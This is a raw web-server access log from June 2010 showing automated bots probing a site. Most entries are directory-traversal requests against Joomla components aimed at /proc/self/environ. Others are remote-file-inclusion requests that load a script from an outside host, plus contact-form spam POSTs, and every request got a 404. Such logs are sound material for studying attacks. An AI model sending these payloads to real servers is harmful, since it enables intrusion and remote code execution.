94.23.63.144 - - [28/Jun/2010:21:40:37 -0500] "GET /logs/access_log.1274832000/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:40:54 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
203.147.62.92 - - [28/Jun/2010:21:41:28 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
94.23.63.144 - - [28/Jun/2010:21:41:46 -0500] "GET /logs/access_log.1274572800/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:41:46 -0500] "GET /*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:41:47 -0500] "GET /logs/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.63.144 - - [28/Jun/2010:21:41:47 -0500] "GET /logs/access_log.1274832000/*.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.803"
203.147.62.92 - - [28/Jun/2010:21:43:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:43:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:43:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:43:51 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:45:27 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:45:27 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:21:45:28 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
207.46.204.244 - - [28/Jun/2010:21:47:28 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.149.175.27 - - [28/Jun/2010:21:51:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
203.147.62.92 - - [28/Jun/2010:21:51:43 -0500] "GET /logs/access_log.1276041600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
174.120.234.211 - - [28/Jun/2010:22:03:09 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.195.112.180 - - [28/Jun/2010:22:03:41 -0500] "GET /logs/access_log.1247702400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.120.234.211 - - [28/Jun/2010:22:04:00 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:22:05:46 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.59.156.163 - - [28/Jun/2010:22:09:04 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:09:11 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:09:24 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.175.27 - - [28/Jun/2010:22:10:42 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
62.149.175.27 - - [28/Jun/2010:22:10:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
62.149.175.27 - - [28/Jun/2010:22:10:47 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
174.120.234.211 - - [28/Jun/2010:22:11:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.59.156.163 - - [28/Jun/2010:22:17:09 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:16 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:17 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:32 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [28/Jun/2010:22:20:35 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.120.234.211 - - [28/Jun/2010:22:20:36 -0500] "GET /logs/access_log.1277164800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:22:20:37 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.120.234.211 - - [28/Jun/2010:22:20:37 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.59.156.163 - - [28/Jun/2010:22:20:56 -0500] "GET /logs/access_log.1275782400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:56 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:56 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:20:57 -0500] "GET /logs/access_log.1275609600//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:22:05 -0500] "GET /logs/access_log.1276214400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:22:05 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:22:05 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:22:08 -0500] "GET /logs/access_log.1275782400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET /logs/access_log.1276214400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET /logs/access_log.1276214400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:15 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:17 -0500] "GET /logs/access_log.1275782400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:23:18 -0500] "GET /logs/access_log.1275782400//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.59.156.163 - - [28/Jun/2010:22:24:06 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.175.27 - - [28/Jun/2010:22:24:36 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
79.137.233.6 - - [28/Jun/2010:22:25:44 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:25:45 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:25:45 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
87.250.252.241 - - [28/Jun/2010:22:25:48 -0500] "GET /logs/access_log.1276128000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
79.137.233.6 - - [28/Jun/2010:22:26:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:26:05 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
174.120.234.211 - - [28/Jun/2010:22:27:14 -0500] "GET /logs/access_log.1275004800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.118.96.160 - - [28/Jun/2010:22:27:20 -0500] "POST /logs/access_log.1266710400/contact.php HTTP/1.1" 404 322 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
189.108.172.26 - - [28/Jun/2010:22:27:21 -0500] "GET /logs/access_log.1276473600/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
87.118.96.160 - - [28/Jun/2010:22:27:21 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
189.108.172.26 - - [28/Jun/2010:22:27:21 -0500] "GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
87.118.96.160 - - [28/Jun/2010:22:27:21 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
189.108.172.26 - - [28/Jun/2010:22:27:21 -0500] "GET /logs/index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
216.129.119.43 - - [28/Jun/2010:22:27:23 -0500] "GET /logs/access_log.1238803200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
81.176.226.100 - - [28/Jun/2010:22:29:07 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:29:16 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
91.196.124.9 - - [28/Jun/2010:22:30:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
109.71.40.31 - - [28/Jun/2010:22:32:12 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
77.222.56.62 - - [28/Jun/2010:22:32:49 -0500] "GET /logs/access_log.1274054400//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.222.56.62 - - [28/Jun/2010:22:32:49 -0500] "GET //index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.222.56.62 - - [28/Jun/2010:22:32:49 -0500] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:22:35:40 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:22:38:25 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
79.137.233.6 - - [28/Jun/2010:22:39:58 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:39:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
203.147.62.92 - - [28/Jun/2010:22:39:59 -0500] "GET /logs/access_log.1277164800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
79.137.233.6 - - [28/Jun/2010:22:39:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:39:59 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
203.147.62.92 - - [28/Jun/2010:22:40:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
79.137.233.6 - - [28/Jun/2010:22:40:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:40:00 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:40:00 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
203.147.62.92 - - [28/Jun/2010:22:40:00 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
79.137.233.6 - - [28/Jun/2010:22:40:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:40:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:40:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
79.137.233.6 - - [28/Jun/2010:22:40:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
203.147.62.92 - - [28/Jun/2010:22:41:14 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:22:41:23 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.110.144.105 - - [28/Jun/2010:22:44:35 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.199.198 - - [28/Jun/2010:22:49:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
109.71.40.31 - - [28/Jun/2010:22:50:40 -0500] "GET /logs/access_log.1276473600/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
109.71.40.31 - - [28/Jun/2010:22:50:44 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
109.71.40.31 - - [28/Jun/2010:22:50:44 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
203.147.62.92 - - [28/Jun/2010:22:51:37 -0500] "GET /logs/access_log.1276473600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:22:51:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
203.147.62.92 - - [28/Jun/2010:22:51:39 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.110.144.105 - - [28/Jun/2010:22:52:37 -0500] "GET /logs/access_log.1276473600/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.110.144.105 - - [28/Jun/2010:22:52:37 -0500] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.110.144.105 - - [28/Jun/2010:22:52:37 -0500] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [28/Jun/2010:22:53:55 -0500] "GET /logs/access_log.1186358400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.186.192.124 - - [28/Jun/2010:22:58:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:09 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:17 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:17 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:17 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:45 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:45 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:58:45 -0500] "GET /logs/access_log.1266710400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:15 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:15 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:15 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:37 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:38 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:42 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:22:59:42 -0500] "GET /logs/access_log.1274572800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
93.186.192.124 - - [28/Jun/2010:23:00:01 -0500] "GET /logs/access_log.1266710400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
